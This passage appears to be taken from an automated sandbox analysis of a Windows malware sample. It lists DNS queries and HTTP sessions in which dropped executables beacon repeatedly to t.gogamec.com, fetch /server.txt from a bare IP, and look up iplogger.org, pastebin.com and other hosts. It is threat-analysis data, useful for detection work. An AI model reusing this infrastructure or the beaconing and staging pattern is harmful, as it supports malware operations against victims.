                                      Aug 21, 2024 11:00:35.764540911 CEST53647971.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:40.743437052 CEST5403353192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:40.752430916 CEST53540331.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:45.744724989 CEST6390853192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:45.754983902 CEST53639081.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:50.743674040 CEST5511153192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:50.752052069 CEST53551111.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:55.743526936 CEST6130153192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:55.751274109 CEST53613011.1.1.1192.168.2.4
                                      Aug 21, 2024 11:01:00.752156019 CEST6341753192.168.2.41.1.1.1
                                      Aug 21, 2024 11:01:00.759634972 CEST53634171.1.1.1192.168.2.4
                                      Aug 21, 2024 11:01:03.512377024 CEST5899653192.168.2.41.1.1.1
                                      Aug 21, 2024 11:01:03.519846916 CEST53589961.1.1.1192.168.2.4
                                      Aug 21, 2024 11:01:05.743944883 CEST5657153192.168.2.41.1.1.1
                                      Aug 21, 2024 11:01:05.830436945 CEST5657153192.168.2.41.1.1.1
                                      Aug 21, 2024 11:01:05.904736042 CEST53565711.1.1.1192.168.2.4
                                      Aug 21, 2024 11:01:05.905031919 CEST53565711.1.1.1192.168.2.4
                                      Aug 21, 2024 11:01:11.384921074 CEST5742153192.168.2.41.1.1.1
                                      Aug 21, 2024 11:01:11.398274899 CEST53574211.1.1.1192.168.2.4
                                      Aug 21, 2024 11:01:15.744168997 CEST6277453192.168.2.41.1.1.1
                                      Aug 21, 2024 11:01:15.752178907 CEST53627741.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 21, 2024 10:57:04.734324932 CEST | 192.168.2.4 | 1.1.1.1 | 0x64ff | Standard query (0) | hsiens.xyz | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:10.045305014 CEST | 192.168.2.4 | 1.1.1.1 | 0xbf8f | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:10.050796986 CEST | 192.168.2.4 | 1.1.1.1 | 0x70e6 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:10.856256008 CEST | 192.168.2.4 | 1.1.1.1 | 0x92f3 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:13.681660891 CEST | 192.168.2.4 | 1.1.1.1 | 0x6ace | Standard query (0) | topniemannpickshop.cc | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:13.829448938 CEST | 192.168.2.4 | 1.1.1.1 | 0xbd73 | Standard query (0) | niemannbest.me | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:13.841700077 CEST | 192.168.2.4 | 1.1.1.1 | 0x9622 | Standard query (0) | all-mobile-pa1ments.com.mx | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:14.014298916 CEST | 192.168.2.4 | 1.1.1.1 | 0x83eb | Standard query (0) | buy-fantasy-football.com.sg | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:14.143168926 CEST | 192.168.2.4 | 1.1.1.1 | 0xcb2 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:15.752553940 CEST | 192.168.2.4 | 1.1.1.1 | 0xb156 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:21.028954029 CEST | 192.168.2.4 | 1.1.1.1 | 0x947f | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:23.005860090 CEST | 192.168.2.4 | 1.1.1.1 | 0x2dc9 | Standard query (0) | ggg-cl.biz | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:25.793355942 CEST | 192.168.2.4 | 1.1.1.1 | 0x6db2 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:28.455341101 CEST | 192.168.2.4 | 1.1.1.1 | 0x3f5 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:29.724462986 CEST | 192.168.2.4 | 1.1.1.1 | 0xd325 | Standard query (0) | wfsdragon.ru | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:30.767766953 CEST | 192.168.2.4 | 1.1.1.1 | 0x7d7c | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:35.742930889 CEST | 192.168.2.4 | 1.1.1.1 | 0xd1fb | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:40.743252039 CEST | 192.168.2.4 | 1.1.1.1 | 0x7744 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:45.743918896 CEST | 192.168.2.4 | 1.1.1.1 | 0xcf29 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:48.967084885 CEST | 192.168.2.4 | 1.1.1.1 | 0x1b57 | Standard query (0) | gmpeople.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:50.744375944 CEST | 192.168.2.4 | 1.1.1.1 | 0xc351 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:55.743808985 CEST | 192.168.2.4 | 1.1.1.1 | 0xca43 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:00.743480921 CEST | 192.168.2.4 | 1.1.1.1 | 0xc9f2 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:05.743520975 CEST | 192.168.2.4 | 1.1.1.1 | 0x59ed | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:10.744029045 CEST | 192.168.2.4 | 1.1.1.1 | 0x4f54 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:15.744858027 CEST | 192.168.2.4 | 1.1.1.1 | 0x36a2 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:20.745326996 CEST | 192.168.2.4 | 1.1.1.1 | 0x9b2e | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:25.758608103 CEST | 192.168.2.4 | 1.1.1.1 | 0x97c7 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:30.743027925 CEST | 192.168.2.4 | 1.1.1.1 | 0xb6af | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:35.743433952 CEST | 192.168.2.4 | 1.1.1.1 | 0x98a0 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:36.758357048 CEST | 192.168.2.4 | 1.1.1.1 | 0x98a0 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:40.895093918 CEST | 192.168.2.4 | 1.1.1.1 | 0xe2fb | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:45.743963003 CEST | 192.168.2.4 | 1.1.1.1 | 0x12d3 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:50.744288921 CEST | 192.168.2.4 | 1.1.1.1 | 0xe701 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:55.743697882 CEST | 192.168.2.4 | 1.1.1.1 | 0x1405 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:00.744194031 CEST | 192.168.2.4 | 1.1.1.1 | 0xa53d | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:05.743172884 CEST | 192.168.2.4 | 1.1.1.1 | 0x1271 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:10.743697882 CEST | 192.168.2.4 | 1.1.1.1 | 0x1fc4 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:15.743554115 CEST | 192.168.2.4 | 1.1.1.1 | 0x1e1e | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:20.743550062 CEST | 192.168.2.4 | 1.1.1.1 | 0x3497 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:25.904891014 CEST | 192.168.2.4 | 1.1.1.1 | 0xcfe6 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:30.743612051 CEST | 192.168.2.4 | 1.1.1.1 | 0x5e0a | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:35.743594885 CEST | 192.168.2.4 | 1.1.1.1 | 0x6fba | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:40.743170023 CEST | 192.168.2.4 | 1.1.1.1 | 0xb888 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:45.743052959 CEST | 192.168.2.4 | 1.1.1.1 | 0x9414 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:50.746447086 CEST | 192.168.2.4 | 1.1.1.1 | 0xa557 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:55.744219065 CEST | 192.168.2.4 | 1.1.1.1 | 0x6917 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:00.747690916 CEST | 192.168.2.4 | 1.1.1.1 | 0xa030 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:05.743555069 CEST | 192.168.2.4 | 1.1.1.1 | 0xc42d | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:10.744560003 CEST | 192.168.2.4 | 1.1.1.1 | 0xbc40 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:15.744064093 CEST | 192.168.2.4 | 1.1.1.1 | 0xef6f | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:20.743937969 CEST | 192.168.2.4 | 1.1.1.1 | 0x159c | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:25.743568897 CEST | 192.168.2.4 | 1.1.1.1 | 0x477f | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:30.744314909 CEST | 192.168.2.4 | 1.1.1.1 | 0xbc38 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:30.805304050 CEST | 192.168.2.4 | 1.1.1.1 | 0xbc38 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:35.753916025 CEST | 192.168.2.4 | 1.1.1.1 | 0xdc20 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:40.743437052 CEST | 192.168.2.4 | 1.1.1.1 | 0xf362 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:45.744724989 CEST | 192.168.2.4 | 1.1.1.1 | 0xbb5a | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:50.743674040 CEST | 192.168.2.4 | 1.1.1.1 | 0x3451 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:55.743526936 CEST | 192.168.2.4 | 1.1.1.1 | 0xaa36 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:00.752156019 CEST | 192.168.2.4 | 1.1.1.1 | 0x828c | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:03.512377024 CEST | 192.168.2.4 | 1.1.1.1 | 0x7e16 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:05.743944883 CEST | 192.168.2.4 | 1.1.1.1 | 0xc0b9 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:05.830436945 CEST | 192.168.2.4 | 1.1.1.1 | 0xc0b9 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:11.384921074 CEST | 192.168.2.4 | 1.1.1.1 | 0x1468 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:15.744168997 CEST | 192.168.2.4 | 1.1.1.1 | 0xb945 | Standard query (0) | t.gogamec.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 21, 2024 10:57:04.754440069 CEST | 1.1.1.1 | 192.168.2.4 | 0x64ff | Name error (3) | hsiens.xyz | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:10.052150965 CEST | 1.1.1.1 | 192.168.2.4 | 0xbf8f | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:10.057504892 CEST | 1.1.1.1 | 192.168.2.4 | 0x70e6 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:10.057504892 CEST | 1.1.1.1 | 192.168.2.4 | 0x70e6 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:10.057504892 CEST | 1.1.1.1 | 192.168.2.4 | 0x70e6 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:10.057504892 CEST | 1.1.1.1 | 192.168.2.4 | 0x70e6 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:10.057504892 CEST | 1.1.1.1 | 192.168.2.4 | 0x70e6 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:13.690707922 CEST | 1.1.1.1 | 192.168.2.4 | 0x6ace | Name error (3) | topniemannpickshop.cc | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:13.839729071 CEST | 1.1.1.1 | 192.168.2.4 | 0xbd73 | Name error (3) | niemannbest.me | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:13.988709927 CEST | 1.1.1.1 | 192.168.2.4 | 0x9622 | Name error (3) | all-mobile-pa1ments.com.mx | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:14.031333923 CEST | 1.1.1.1 | 192.168.2.4 | 0x83eb | Name error (3) | buy-fantasy-football.com.sg | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:14.155388117 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb2 | No error (0) | iplogger.org | | 172.67.132.113 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:14.155388117 CEST | 1.1.1.1 | 192.168.2.4 | 0xcb2 | No error (0) | iplogger.org | | 104.21.4.208 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:15.763009071 CEST | 1.1.1.1 | 192.168.2.4 | 0xb156 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:21.063889980 CEST | 1.1.1.1 | 192.168.2.4 | 0x947f | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:23.016902924 CEST | 1.1.1.1 | 192.168.2.4 | 0x2dc9 | Name error (3) | ggg-cl.biz | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:25.803114891 CEST | 1.1.1.1 | 192.168.2.4 | 0x6db2 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:28.462510109 CEST | 1.1.1.1 | 192.168.2.4 | 0x3f5 | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:28.462510109 CEST | 1.1.1.1 | 192.168.2.4 | 0x3f5 | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:28.462510109 CEST | 1.1.1.1 | 192.168.2.4 | 0x3f5 | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:29.891536951 CEST | 1.1.1.1 | 192.168.2.4 | 0xd325 | No error (0) | wfsdragon.ru | | 172.67.133.215 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:29.891536951 CEST | 1.1.1.1 | 192.168.2.4 | 0xd325 | No error (0) | wfsdragon.ru | | 104.21.5.208 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:30.803325891 CEST | 1.1.1.1 | 192.168.2.4 | 0x7d7c | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:35.752973080 CEST | 1.1.1.1 | 192.168.2.4 | 0xd1fb | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:40.775892019 CEST | 1.1.1.1 | 192.168.2.4 | 0x7744 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:45.776489973 CEST | 1.1.1.1 | 192.168.2.4 | 0xcf29 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:49.609154940 CEST | 1.1.1.1 | 192.168.2.4 | 0x1b57 | No error (0) | gmpeople.com | | 188.40.141.211 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:50.758833885 CEST | 1.1.1.1 | 192.168.2.4 | 0xc351 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:57:55.753973961 CEST | 1.1.1.1 | 192.168.2.4 | 0xca43 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:01.064625978 CEST | 1.1.1.1 | 192.168.2.4 | 0xc9f2 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:05.754246950 CEST | 1.1.1.1 | 192.168.2.4 | 0x59ed | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:10.777149916 CEST | 1.1.1.1 | 192.168.2.4 | 0x4f54 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:15.756114960 CEST | 1.1.1.1 | 192.168.2.4 | 0x36a2 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:20.770121098 CEST | 1.1.1.1 | 192.168.2.4 | 0x9b2e | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:25.768310070 CEST | 1.1.1.1 | 192.168.2.4 | 0x97c7 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:30.754036903 CEST | 1.1.1.1 | 192.168.2.4 | 0xb6af | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:36.959250927 CEST | 1.1.1.1 | 192.168.2.4 | 0x98a0 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:36.971368074 CEST | 1.1.1.1 | 192.168.2.4 | 0x98a0 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:41.157186985 CEST | 1.1.1.1 | 192.168.2.4 | 0xe2fb | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:45.900995970 CEST | 1.1.1.1 | 192.168.2.4 | 0x12d3 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:50.754959106 CEST | 1.1.1.1 | 192.168.2.4 | 0xe701 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:58:55.780023098 CEST | 1.1.1.1 | 192.168.2.4 | 0x1405 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:00.753262997 CEST | 1.1.1.1 | 192.168.2.4 | 0xa53d | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:05.752636909 CEST | 1.1.1.1 | 192.168.2.4 | 0x1271 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:10.778723001 CEST | 1.1.1.1 | 192.168.2.4 | 0x1fc4 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:15.920403957 CEST | 1.1.1.1 | 192.168.2.4 | 0x1e1e | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:20.757042885 CEST | 1.1.1.1 | 192.168.2.4 | 0x3497 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:25.915009975 CEST | 1.1.1.1 | 192.168.2.4 | 0xcfe6 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:31.029889107 CEST | 1.1.1.1 | 192.168.2.4 | 0x5e0a | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:35.751316071 CEST | 1.1.1.1 | 192.168.2.4 | 0x6fba | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:40.753799915 CEST | 1.1.1.1 | 192.168.2.4 | 0xb888 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:45.774305105 CEST | 1.1.1.1 | 192.168.2.4 | 0x9414 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:50.756500959 CEST | 1.1.1.1 | 192.168.2.4 | 0xa557 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 10:59:55.751503944 CEST | 1.1.1.1 | 192.168.2.4 | 0x6917 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:00.754420042 CEST | 1.1.1.1 | 192.168.2.4 | 0xa030 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:05.751183033 CEST | 1.1.1.1 | 192.168.2.4 | 0xc42d | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:10.756506920 CEST | 1.1.1.1 | 192.168.2.4 | 0xbc40 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:15.752898932 CEST | 1.1.1.1 | 192.168.2.4 | 0xef6f | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:20.751422882 CEST | 1.1.1.1 | 192.168.2.4 | 0x159c | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:25.751151085 CEST | 1.1.1.1 | 192.168.2.4 | 0x477f | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:31.242646933 CEST | 1.1.1.1 | 192.168.2.4 | 0xbc38 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:31.242655039 CEST | 1.1.1.1 | 192.168.2.4 | 0xbc38 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:35.764540911 CEST | 1.1.1.1 | 192.168.2.4 | 0xdc20 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:40.752430916 CEST | 1.1.1.1 | 192.168.2.4 | 0xf362 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:45.754983902 CEST | 1.1.1.1 | 192.168.2.4 | 0xbb5a | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:50.752052069 CEST | 1.1.1.1 | 192.168.2.4 | 0x3451 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:00:55.751274109 CEST | 1.1.1.1 | 192.168.2.4 | 0xaa36 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:00.759634972 CEST | 1.1.1.1 | 192.168.2.4 | 0x828c | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:03.519846916 CEST | 1.1.1.1 | 192.168.2.4 | 0x7e16 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:03.519846916 CEST | 1.1.1.1 | 192.168.2.4 | 0x7e16 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:03.519846916 CEST | 1.1.1.1 | 192.168.2.4 | 0x7e16 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:03.519846916 CEST | 1.1.1.1 | 192.168.2.4 | 0x7e16 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:03.519846916 CEST | 1.1.1.1 | 192.168.2.4 | 0x7e16 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:05.904736042 CEST | 1.1.1.1 | 192.168.2.4 | 0xc0b9 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:05.905031919 CEST | 1.1.1.1 | 192.168.2.4 | 0xc0b9 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:11.398274899 CEST | 1.1.1.1 | 192.168.2.4 | 0x1468 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
Aug 21, 2024 11:01:15.752178907 CEST | 1.1.1.1 | 192.168.2.4 | 0xb945 | Name error (3) | t.gogamec.com | none | none | A (IP address) | IN (0x0001) | false
                                      • cdn.discordapp.com
                                      • iplogger.org
                                      • pastebin.com
                                      • 45.133.1.107
                                      • ip-api.com
                                      • wfsdragon.ru
                                      • 51.178.186.149
                                      • 45.9.20.13
                                      • gmpeople.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 45.133.1.107 | 80 | 7996 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:57:06.867872953 CEST | 200 | OUT | GET /server.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: 45.133.1.107


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449735208.95.112.1807940C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:57:10.062691927 CEST498OUTGET /json/ HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                      Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                      viewport-width: 1920
                                      Host: ip-api.com
                                      Aug 21, 2024 10:57:10.529217958 CEST482INHTTP/1.1 200 OK
                                      Date: Wed, 21 Aug 2024 08:57:10 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 305
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}


